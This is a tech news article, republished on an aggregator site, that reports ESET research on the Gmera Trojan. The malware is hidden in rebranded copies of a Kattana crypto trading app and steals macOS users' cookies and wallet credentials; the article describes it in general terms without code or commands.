Wednesday, March 3, 2021
  • Setup menu at Appearance » Menus and assign menu to Top Bar Navigation
Advertisement
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News
No Result
View All Result
NikolaNews
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News
No Result
View All Result
NikolaNews
No Result
View All Result
Home Internet Security

Mac users trying to trade cryptocurrencies targeted by Gmera Trojan operators

July 19, 2020
in Internet Security
Mac users trying to trade cryptocurrencies targeted by Gmera Trojan operators
586
SHARES
3.3k
VIEWS
Share on FacebookShare on Twitter

Apple macOS users are being targeted in a fresh campaign aiming to pilfer cryptocurrency from their wallets.

Trojanized cryptocurrency trading software and applications designed for Apple’s operating system have been spotted recently by ESET researchers, who detailed their findings in a blog post on Thursday. 

You might also like

Remote work: 5 things every business needs to know

New app rollout helps reduce paperwork for NSW frontline child protection caseworkers

Linux Mint may start pushing high-priority patches to users

The Trojanized applications are being offered online as versions of legitimate trading software, such as those developed by Kattana, an organization that has created a desktop terminal app for crypto trades. 

ESET is not sure of the exact infection attack vector, but it does appear that social engineering is in play, especially considering Kattana’s warning in March that users were being directly approached to download malware-laden apps. Copycat websites claiming to be versions of Kattana have also been spotted. 

“The hypothesis of the operators directly contacting their targets and socially engineering them into installing the malicious application seems the most plausible,” the researchers say. 

Four rebranded versions of the legitimate Kattana app have been tracked so far — named Cointrazer, Cupatrade, Licatrade, and Trezarus — which do facilitate trading but also include a Gmera installer bundled in the software.

Researchers from Trend Micro published an analysis of Gmera back in 2019. The malware was previously found bundled in another Mac trading app called Stockfolio.

Upon execution, Gmera first connects to a command-and-control (C2) center over HTTP and then connects remote terminal sessions to another C2 via a hardcoded IP address. 

Using the Licatrade sample as the basis for analysis — although there are slight variations in each rebranded type — ESET noted that a shell script is first deployed to create the C2 connection, as well as to maintain persistence by installing a Launch Agent.

However, the Launch Agent is broken in Licatrade. The attackers intended to open a reverse shell from the victim machine to an attacker-controlled server, but in other versions of the Trojanized app, the persistence mechanism works. 

Much of the legitimate Kattana terminal was left intact, including a login mechanism required by the app to link wallets and trading — a feature that the fraudsters can take advantage of to access victim wallets. 

See also: Smartwatch tracker for the vulnerable can be hacked to send medication alerts

In the reconnaissance stage, the malware will pull machine data and will also list available Wi-Fi networks as honeypots will likely have this form of connectivity disabled. Gmera will also scan for virtual machines and will take a screenshot to see what version of macOS is in use. 

The operators intended to skip this check if Catalina is installed as users must approve screenshots or screen recordings each time — and so if the check goes ahead, this would throw up a suspicious warning. However, errors in the malware’s code mean that regardless of the OS, the screenshot is taken. 

TechRepublic: Software-defined perimeters may be the solution to remote work security concerns

“It is interesting to note how the malware operation is more limited on the most recent version macOS,” ESET added. “We did not see the operators try to circumvent the limitation surrounding screen captures. Further, we believe that the only way that they could see the computer screen on victim machines running Catalina would be to exfiltrate existing screenshots taken by the victim.”

The data theft then begins. Reverse shells are used to exfiltrate browser cookies, browsing histories, and cryptocurrency wallet credentials. 

The certificate used to sign off the software was set to Andrey Novoselov and was issued by Apple on April 6. The iPad and iPhone maker revoked the certificate on May 28 after being made aware of how it was being abused. 

CNET: Google targets stalkerware in updated ad policy

In each campaign traced by ESET, a different macOS certificate — since revoked — was in play. 

“In the case of Cointrazer, there were only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their Trojanized application,” the researchers say. “This, and the fact that we didn’t find anything else signed with the same key, suggests they got the certificate explicitly for that purpose.”

Previous and related coverage


Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0



Credit:
Zdnet

Previous Post

How Machine Learning Will Impact the Future of Software Development and Testing

Next Post

7 Best Tableau Online Courses for Data Science and Visualization | by javinpaul | Jul, 2020

Related Posts

Remote work: 5 things every business needs to know
Internet Security

Remote work: 5 things every business needs to know

March 3, 2021
New app rollout helps reduce paperwork for NSW frontline child protection caseworkers
Internet Security

New app rollout helps reduce paperwork for NSW frontline child protection caseworkers

March 3, 2021
Linux Mint may start pushing high-priority patches to users
Internet Security

Linux Mint may start pushing high-priority patches to users

March 3, 2021
Ransomware puzzle: These two pieces of malware look very different, but they evolved from the same root
Internet Security

Ransomware puzzle: These two pieces of malware look very different, but they evolved from the same root

March 3, 2021
Google addresses customer data protection, security in Workspace
Internet Security

Google addresses customer data protection, security in Workspace

March 2, 2021
Next Post
7 Best Tableau Online Courses for Data Science and Visualization | by javinpaul | Jul, 2020

7 Best Tableau Online Courses for Data Science and Visualization | by javinpaul | Jul, 2020

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

Plasticity in Deep Learning: Dynamic Adaptations for AI Self-Driving Cars

Plasticity in Deep Learning: Dynamic Adaptations for AI Self-Driving Cars

January 6, 2019
Microsoft, Google Use Artificial Intelligence to Fight Hackers

Microsoft, Google Use Artificial Intelligence to Fight Hackers

January 6, 2019

Categories

  • Artificial Intelligence
  • Big Data
  • Blockchain
  • Crypto News
  • Data Science
  • Digital Marketing
  • Internet Privacy
  • Internet Security
  • Learn to Code
  • Machine Learning
  • Marketing Technology
  • Neural Networks
  • Technology Companies

Don't miss it

URGENT — 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange
Internet Privacy

URGENT — 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange

March 3, 2021
This Protein Therapeutics Company Integrates Wet Lab For High-Speed Characterization With Machine Learning Technologies To Guide The Search For Better Antibodies
Machine Learning

This Protein Therapeutics Company Integrates Wet Lab For High-Speed Characterization With Machine Learning Technologies To Guide The Search For Better Antibodies

March 3, 2021
Breadcrumbing Job Applicants: Bad for Employers
Marketing Technology

Breadcrumbing Job Applicants: Bad for Employers

March 3, 2021
Remote work: 5 things every business needs to know
Internet Security

Remote work: 5 things every business needs to know

March 3, 2021
Yum! Brands Acquires AI Company
Machine Learning

Yum! Brands Acquires AI Company

March 3, 2021
Customer Experience Management and Improvement
Marketing Technology

Customer Experience Management and Improvement

March 3, 2021
NikolaNews

NikolaNews.com is an online News Portal which aims to share news about blockchain, AI, Big Data, and Data Privacy and more!

What’s New Here?

  • URGENT — 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange March 3, 2021
  • This Protein Therapeutics Company Integrates Wet Lab For High-Speed Characterization With Machine Learning Technologies To Guide The Search For Better Antibodies March 3, 2021
  • Breadcrumbing Job Applicants: Bad for Employers March 3, 2021
  • Remote work: 5 things every business needs to know March 3, 2021

Subscribe to get more!

© 2019 NikolaNews.com - Global Tech Updates

No Result
View All Result
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News

© 2019 NikolaNews.com - Global Tech Updates